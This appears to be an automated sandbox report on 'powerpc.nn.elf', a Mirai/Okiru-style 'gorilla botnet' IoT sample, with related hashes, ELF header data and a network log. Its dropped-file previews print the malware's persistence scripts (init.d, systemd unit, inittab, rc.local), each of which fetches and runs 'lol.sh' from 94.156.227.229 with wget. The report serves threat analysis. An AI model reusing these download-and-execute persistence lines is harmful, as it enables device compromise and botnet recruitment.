                      mips.nn.elfGet hashmaliciousOkiruBrowse
                        arm5.nn.elfGet hashmaliciousOkiruBrowse
                          sh4.nn.elfGet hashmaliciousOkiruBrowse
                            91.189.91.43db0fa4b8db0333367e9bda3ab68b8042.mpsl.elfGet hashmaliciousUnknownBrowse
                              RpcSecurity.arm5.elfGet hashmaliciousUnknownBrowse
                                RpcSecurity.arc.elfGet hashmaliciousMiraiBrowse
                                  RpcSecurity.sh4.elfGet hashmaliciousUnknownBrowse
                                    db0fa4b8db0333367e9bda3ab68b8042.arm5.elfGet hashmaliciousUnknownBrowse
                                      db0fa4b8db0333367e9bda3ab68b8042.ppc.elfGet hashmaliciousUnknownBrowse
                                        db0fa4b8db0333367e9bda3ab68b8042.arm.elfGet hashmaliciousUnknownBrowse
                                          bin.sh.elfGet hashmaliciousUnknownBrowse
                                            mipsel.elfGet hashmaliciousUnknownBrowse
                                              .i.elfGet hashmaliciousUnknownBrowse
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CANONICAL-ASGBdb0fa4b8db0333367e9bda3ab68b8042.mpsl.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                RpcSecurity.arm5.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                RpcSecurity.arm7.elfGet hashmaliciousMiraiBrowse
                                                • 185.125.190.26
                                                RpcSecurity.ppc.elfGet hashmaliciousUnknownBrowse
                                                • 185.125.190.26
                                                RpcSecurity.arc.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                RpcSecurity.sh4.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                db0fa4b8db0333367e9bda3ab68b8042.arm5.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                db0fa4b8db0333367e9bda3ab68b8042.ppc.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                db0fa4b8db0333367e9bda3ab68b8042.arm.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                bin.sh.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                CANONICAL-ASGBdb0fa4b8db0333367e9bda3ab68b8042.mpsl.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                RpcSecurity.arm5.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                RpcSecurity.arm7.elfGet hashmaliciousMiraiBrowse
                                                • 185.125.190.26
                                                RpcSecurity.ppc.elfGet hashmaliciousUnknownBrowse
                                                • 185.125.190.26
                                                RpcSecurity.arc.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                RpcSecurity.sh4.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                db0fa4b8db0333367e9bda3ab68b8042.arm5.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                db0fa4b8db0333367e9bda3ab68b8042.ppc.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                db0fa4b8db0333367e9bda3ab68b8042.arm.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                bin.sh.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                INIT7CHdb0fa4b8db0333367e9bda3ab68b8042.mpsl.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                RpcSecurity.arm5.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                RpcSecurity.arc.elfGet hashmaliciousMiraiBrowse
                                                • 109.202.202.202
                                                RpcSecurity.sh4.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                db0fa4b8db0333367e9bda3ab68b8042.arm5.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                db0fa4b8db0333367e9bda3ab68b8042.ppc.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                db0fa4b8db0333367e9bda3ab68b8042.arm.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                bin.sh.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                mipsel.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                .i.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                NETIXBGx86_64.nn.elfGet hashmaliciousOkiruBrowse
                                                • 94.156.227.234
                                                x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                                • 94.156.227.234
                                                mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                • 94.156.227.234
                                                powerpc.nn.elfGet hashmaliciousOkiruBrowse
                                                • 94.156.227.234
                                                sparc.nn.elfGet hashmaliciousOkiruBrowse
                                                • 94.156.227.234
                                                arm7.nn-20241224-0652.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 94.156.227.234
                                                arm.nn-20241224-0652.elfGet hashmaliciousOkiruBrowse
                                                • 94.156.227.234
                                                mips.nn.elfGet hashmaliciousOkiruBrowse
                                                • 94.156.227.234
                                                arm5.nn.elfGet hashmaliciousOkiruBrowse
                                                • 94.156.227.234
                                                sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                • 94.156.227.234
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                /etc/rc.localx86_64.nn.elfGet hashmaliciousOkiruBrowse
                                                  x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                                    mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                      powerpc.nn.elfGet hashmaliciousOkiruBrowse
                                                        sparc.nn.elfGet hashmaliciousOkiruBrowse
                                                          arm7.nn-20241224-0652.elfGet hashmaliciousMirai, OkiruBrowse
                                                            arm.nn-20241224-0652.elfGet hashmaliciousOkiruBrowse
                                                              mips.nn.elfGet hashmaliciousOkiruBrowse
                                                                m68k.nn.elfGet hashmaliciousOkiruBrowse
                                                                  arm5.nn.elfGet hashmaliciousOkiruBrowse
                                                                    Process:/tmp/powerpc.nn.elf
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):129
                                                                    Entropy (8bit):4.628289862910153
                                                                    Encrypted:false
                                                                    SSDEEP:3:KPJRXgzpJDFDDoCvLdjX43LbaaFOdFXa5O:WJRgrZfoYZX47baaeXCO
                                                                    MD5:AEF4F0C23214770CBBC7303556CDE1D7
                                                                    SHA1:566ADDE8FE217D90C8DC2BF1A24B9BF033A6C017
                                                                    SHA-256:A6523F829D13FBD9352945D290012DC90F0BD9FEE034F9F3E9416FAEA64DF01A
                                                                    SHA-512:50140C58CFCFA2EFD7D3F5610177E4FFD148B3304E285CA59B43F0FD123C869596FC8E47C35A45CD3FB3556D6861C73F7EF47B873259233D25B63AD880547A81
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:run bootcmd_mmc0; /tmp/powerpc.nn.elf && wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                    Process:/bin/sh
                                                                    File Type:POSIX shell script, ASCII text executable
                                                                    Category:dropped
                                                                    Size (bytes):421
                                                                    Entropy (8bit):4.54879019053483
                                                                    Encrypted:false
                                                                    SSDEEP:12:QRkgXNxrxKUJgjvMrF+uKN+dRRucSOyd3:6x1IYFYOM3
                                                                    MD5:7197DA53CFDEE6052569983699F64E69
                                                                    SHA1:5B07B57533E89381ED41596569D3EE0BE4754714
                                                                    SHA-256:31E4519A9C0E204C6140C7A4E377309363A58E1615ED05E864EAD0B94E636E69
                                                                    SHA-512:AF5CEA64ED33F7413D7604C32F63868BA8CB2E82A96BCAA00B7986A2D6AC9CDE341D11ABC78460B2D5EF61A041029DB2B18E98C00910CD4FB68B9D70F59C68D4
                                                                    Malicious:true
                                                                    Reputation:low
                                                                    Preview:#!/bin/sh.# /etc/init.d/powerpc.nn.elf..case "" in. start). echo 'Starting powerpc.nn.elf'. /tmp/powerpc.nn.elf &. wget http://94.156.227.229/lol.sh -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping powerpc.nn.elf'. killall powerpc.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start|stop|restart}". exit 1. ;;.esac.exit 0.
                                                                    Process:/tmp/powerpc.nn.elf
                                                                    File Type:POSIX shell script, ASCII text executable
                                                                    Category:dropped
                                                                    Size (bytes):116
                                                                    Entropy (8bit):4.6198881019260805
                                                                    Encrypted:false
                                                                    SSDEEP:3:TKH4vZKgzpJDFDvSDRFiLdjX43LpaKB0dFLoKE0:h8grZzSXoZX47zBeLXE0
                                                                    MD5:C88C8C7E36CC0451320B6C17EA83C314
                                                                    SHA1:AB1212186BDB893CEAD65DE89D5E0CD3E029B844
                                                                    SHA-256:7BA542A8D17E5349EF1184878F0077C5A25AE373251FA4BFF499D16283065709
                                                                    SHA-512:F4C018A106252416153A1F17E2EACEEAE459F5D7992D2A5422D8D7CCF844EBA969144D5289A7FE27F8C4F275199156F58C2434ABBF035F73507163EAFF1E882B
                                                                    Malicious:true
                                                                    Reputation:low
                                                                    Preview:#!/bin/sh./tmp/powerpc.nn.elf &.wget http://94.156.227.229/lol.sh -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.
                                                                    Process:/tmp/powerpc.nn.elf
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):121
                                                                    Entropy (8bit):4.554598683088093
                                                                    Encrypted:false
                                                                    SSDEEP:3:nAWu52zpJDFDDoCvLdjX43LbaaFOdFXa5O:AorZfoYZX47baaeXCO
                                                                    MD5:D3954A5B40C51CF0C3F129B0F1537905
                                                                    SHA1:7C60C203DC2373EBD79D85CFE50019CB5BBDDADC
                                                                    SHA-256:CA4E8F8E957872825927EB6B61F57B89A4EE2A127FE61F954183589D9EAE410A
                                                                    SHA-512:C10B47095CE01291DA14807FEB071455DCE7D83630830D5E966FB27BD4D695755C1EEC064FABD40E248C458C1E91A21CB8ECCE931D8B9C3821C52688C0DF5437
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:::respawn:/tmp/powerpc.nn.elf && wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                    Process:/tmp/powerpc.nn.elf
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):53
                                                                    Entropy (8bit):3.871459242626451
                                                                    Encrypted:false
                                                                    SSDEEP:3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
                                                                    MD5:2BD9B4BE30579E633FC0191AA93DF486
                                                                    SHA1:7D63A9BD9662E86666B27C1B50DB8E7370C624FF
                                                                    SHA-256:64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
                                                                    SHA-512:AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:gorilla botnet is on the device ur not a cat go away.
                                                                    Process:/tmp/powerpc.nn.elf
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):112
                                                                    Entropy (8bit):4.473756997643589
                                                                    Encrypted:false
                                                                    SSDEEP:3:TggzpJDFDvSDRFiLdjX43LbaaFOdFXa50:TggrZzSXoZX47baaeXC0
                                                                    MD5:34C9925D66B1DF0DEA71D3301B7C8972
                                                                    SHA1:E572BD960156D7D8567344792DF1FD3F2E5CB3EC
                                                                    SHA-256:F82C18F17EC5734974B0FBA4FC82B0C8EA3A5AD053206554F4F0BF53908A3F24
                                                                    SHA-512:42770753E40F786EA7A486D9A9ECBCADF554099E73464A1FED4FE09AE1B8634000EBC98EFD328BCE7BBBD851B23A8606F3E971540AB10A9628E61EFE6C75A366
                                                                    Malicious:true
                                                                    Reputation:low
                                                                    Preview:/tmp/powerpc.nn.elf &.wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.
                                                                    Process:/tmp/powerpc.nn.elf
                                                                    File Type:POSIX shell script, ASCII text executable
                                                                    Category:dropped
                                                                    Size (bytes):10
                                                                    Entropy (8bit):3.121928094887362
                                                                    Encrypted:false
                                                                    SSDEEP:3:TKH4vn:hv
                                                                    MD5:3E2B31C72181B87149FF995E7202C0E3
                                                                    SHA1:BD971BEC88149956458A10FC9C5ECB3EB99DD452
                                                                    SHA-256:A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
                                                                    SHA-512:543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                                                    • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                                                    • Filename: mipsel.nn.elf, Detection: malicious, Browse
                                                                    • Filename: powerpc.nn.elf, Detection: malicious, Browse
                                                                    • Filename: sparc.nn.elf, Detection: malicious, Browse
                                                                    • Filename: arm7.nn-20241224-0652.elf, Detection: malicious, Browse
                                                                    • Filename: arm.nn-20241224-0652.elf, Detection: malicious, Browse
                                                                    • Filename: mips.nn.elf, Detection: malicious, Browse
                                                                    • Filename: m68k.nn.elf, Detection: malicious, Browse
                                                                    • Filename: arm5.nn.elf, Detection: malicious, Browse
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:#!/bin/sh.
                                                                    Process:/tmp/powerpc.nn.elf
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):310
                                                                    Entropy (8bit):5.042022707491449
                                                                    Encrypted:false
                                                                    SSDEEP:6:z8ifitRZAMzdK+Urz02+GWRAZX47N2+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+U/p+GWRkKY+GWRXY+GWRuO
                                                                    MD5:63FDEB394565110FDD9B5E05C1AAF9C7
                                                                    SHA1:D63FBF7A8C17E49315DC7C6B13955C356077FFC9
                                                                    SHA-256:646D172C61E45C4D24DDC2130DF45FF055E7A02FD93A9FFC8453CFB096F4E43C
                                                                    SHA-512:10AE0A563FE9DA7F477684D725128252F1978A13CD3CF1C42304A2078116D7269B1B92AA4C0304DD774AB187A28D23AA9691809DEA3FFE45A2CE0BFD90B37851
                                                                    Malicious:false
                                                                    Preview:[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/powerpc.nn.elf.ExecStartPost=/usr/bin/wget http://94.156.227.229/lol.sh -O /tmp/lol.sh.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.
                                                                    Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):76
                                                                    Entropy (8bit):3.7627880354948586
                                                                    Encrypted:false
                                                                    SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                    MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                    SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                    SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                    SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                    Malicious:false
                                                                    Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                    Process:/tmp/powerpc.nn.elf
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):20
                                                                    Entropy (8bit):3.684183719779189
                                                                    Encrypted:false
                                                                    SSDEEP:3:TggzpJDln:Tggr5n
                                                                    MD5:3613970D3EE99A4E79418B3D50DD068E
                                                                    SHA1:0924DD5DC5D93B8E039D25A958AB8F9B13716AF7
                                                                    SHA-256:B161506DF184EF3F0AAB6A26EB9F22F81B6225876EC250AF1F8794A731C82F01
                                                                    SHA-512:B3C0A28198FB6C862279CA2C39A3CCF910237A39861F9C62BD8818A855755E0F7A9C19B4306F77B0D9AD73C988570BE74A6AC22BDDA958D4A0C85D333EF4F9C1
                                                                    Malicious:false
                                                                    Preview:/tmp/powerpc.nn.elf.
                                                                    File type:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
                                                                    Entropy (8bit):6.377870839296606
                                                                    TrID:
                                                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                    File name:powerpc.nn.elf
                                                                    File size:88'316 bytes
                                                                    MD5:27556d2513e616e4e82a3c0f316bf211
                                                                    SHA1:ccf04ec9ee1f0e89f3bf22ef622413cfb234eb07
                                                                    SHA256:d16abea205781840fd8919c949b3723df682ea58c0caadfa5f138d4aa1d25f09
                                                                    SHA512:72f6a826a10e1b86aac6971e78bde12401ed095ee9468cd0e79ec1f8833abaed8b8f6dc9d78415547bdf67b1a250db0e79072623790623ae5cb822962ef18812
                                                                    SSDEEP:1536:Ijcb5ed2bfhCSZcxPg1ll6PR0oSON1ajLhqOJn+Ju5VZ4RJ9PEEI0:T5vZAPR0JOKv/+JuKRzEEn
                                                                    TLSH:D9835C03731C0A43D1E719F02A3F47E1D3FAAA9111F4B684650EEB4A91B5E36558AFCD
                                                                    File Content Preview:.ELF...........................4..W......4. ...(......................Q...Q...............Q...Q...Q.......&.........dt.Q.............................!..|......$H...H.+....$8!. |...N.. .!..|.......?.........W8..../...@..\?.....R..+../...A..$8...})....R.N..

                                                                    ELF header

                                                                    Class:ELF32
                                                                    Data:2's complement, big endian
                                                                    Version:1 (current)
                                                                    Machine:PowerPC
                                                                    Version Number:0x1
                                                                    Type:EXEC (Executable file)
                                                                    OS/ABI:UNIX - System V
                                                                    ABI Version:0
                                                                    Entry Point Address:0x100001f0
                                                                    Flags:0x0
                                                                    ELF Header Size:52
                                                                    Program Header Offset:52
                                                                    Program Header Size:32
                                                                    Number of Program Headers:3
                                                                    Section Header Offset:87836
                                                                    Section Header Size:40
                                                                    Number of Section Headers:12
                                                                    Header String Table Index:11
                                                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                    NULL0x00x00x00x00x0000
                                                                    .initPROGBITS0x100000940x940x240x00x6AX004
                                                                    .textPROGBITS0x100000b80xb80x12b740x00x6AX004
                                                                    .finiPROGBITS0x10012c2c0x12c2c0x200x00x6AX004
                                                                    .rodataPROGBITS0x10012c500x12c500x25a80x00x2A008
                                                                    .ctorsPROGBITS0x100251fc0x151fc0x80x00x3WA004
                                                                    .dtorsPROGBITS0x100252040x152040x80x00x3WA004
                                                                    .dataPROGBITS0x100252100x152100x4840x00x3WA008
                                                                    .sdataPROGBITS0x100256940x156940x3c0x00x3WA004
                                                                    .sbssNOBITS0x100256d00x156d00x680x00x3WA004
                                                                    .bssNOBITS0x100257380x156d00x21ac0x00x3WA004
                                                                    .shstrtabSTRTAB0x00x156d00x4b0x00x0001
                                                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                    LOAD0x00x100000000x100000000x151f80x151f86.40340x5R E0x10000.init .text .fini .rodata
                                                                    LOAD0x151fc0x100251fc0x100251fc0x4d40x26e84.73810x6RW 0x10000.ctors .dtors .data .sdata .sbss .bss
                                                                    GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 27, 2024 09:13:52.186223030 CET43928443192.168.2.2391.189.91.42
                                                                    Dec 27, 2024 09:13:52.653393030 CET6000438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:52.773042917 CET382426000494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:13:52.773109913 CET6000438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:52.773536921 CET6000438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:52.893026114 CET382426000494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:13:53.437150002 CET6000438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:53.601835966 CET382426000494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:13:54.039959908 CET382426000494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:13:54.040015936 CET6000438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:54.446952105 CET6000638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:54.566466093 CET382426000694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:13:54.566529989 CET6000638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:54.566562891 CET6000638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:54.686084986 CET382426000694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:13:55.086474895 CET6000638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:55.250627041 CET382426000694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:13:55.768313885 CET382426000694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:13:55.768376112 CET6000638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:56.104135036 CET6000838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:56.223630905 CET382426000894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:13:56.223694086 CET6000838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:56.223737955 CET6000838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:56.345484972 CET382426000894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:13:56.742552996 CET6000838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:56.902698040 CET382426000894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:13:57.349150896 CET382426000894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:13:57.349258900 CET6000838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:57.565407991 CET42836443192.168.2.2391.189.91.43
                                                                    Dec 27, 2024 09:13:57.790724039 CET6001038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:57.911120892 CET382426001094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:13:57.911206007 CET6001038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:57.911253929 CET6001038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:58.031258106 CET382426001094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:13:58.418884039 CET6001038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:58.582616091 CET382426001094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:13:59.080579042 CET382426001094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:13:59.080683947 CET6001038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:59.353249073 CET4251680192.168.2.23109.202.202.202
                                                                    Dec 27, 2024 09:13:59.421387911 CET6001238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:59.541205883 CET382426001294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:13:59.541275978 CET6001238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:59.541369915 CET6001238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:13:59.661706924 CET382426001294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:00.190140963 CET6001238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:00.351074934 CET382426001294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:00.735717058 CET382426001294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:00.735780954 CET6001238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:01.192734003 CET6001438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:01.312329054 CET382426001494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:01.312410116 CET6001438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:01.312484980 CET6001438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:01.431998014 CET382426001494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:01.820388079 CET6001438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:01.986622095 CET382426001494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:02.437150955 CET382426001494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:02.437227964 CET6001438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:02.821471930 CET6001638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:02.941023111 CET382426001694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:02.941179991 CET6001638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:02.941179991 CET6001638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:03.060688019 CET382426001694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:03.448446989 CET6001638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:03.614675045 CET382426001694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:04.193389893 CET382426001694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:04.193490982 CET6001638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:04.452235937 CET6001838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:04.571921110 CET382426001894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:04.572035074 CET6001838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:04.572035074 CET6001838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:04.691792011 CET382426001894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:05.078915119 CET6001838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:05.238605976 CET382426001894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:05.719985962 CET382426001894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:05.720091105 CET6001838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:06.079853058 CET6002038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:06.199749947 CET382426002094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:06.199877024 CET6002038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:06.199907064 CET6002038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:06.319709063 CET382426002094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:06.703824997 CET6002038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:06.866744041 CET382426002094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:07.381058931 CET382426002094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:07.381165981 CET6002038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:07.705532074 CET6002238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:07.825069904 CET382426002294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:07.825206995 CET6002238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:07.825247049 CET6002238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:07.944914103 CET382426002294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:08.329962969 CET6002238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:08.490876913 CET382426002294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:09.028493881 CET382426002294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:09.028748035 CET6002238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:09.331799984 CET6002438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:09.451420069 CET382426002494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:09.451708078 CET6002438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:09.451708078 CET6002438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:09.571382999 CET382426002494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:09.956882000 CET6002438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:10.118680954 CET382426002494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:10.614309072 CET382426002494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:10.614423990 CET6002438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:10.958920002 CET6002638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:11.078598976 CET382426002694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:11.078726053 CET6002638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:11.078764915 CET6002638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:11.198471069 CET382426002694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:11.582242012 CET6002638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:11.746758938 CET382426002694.156.227.234192.168.2.23
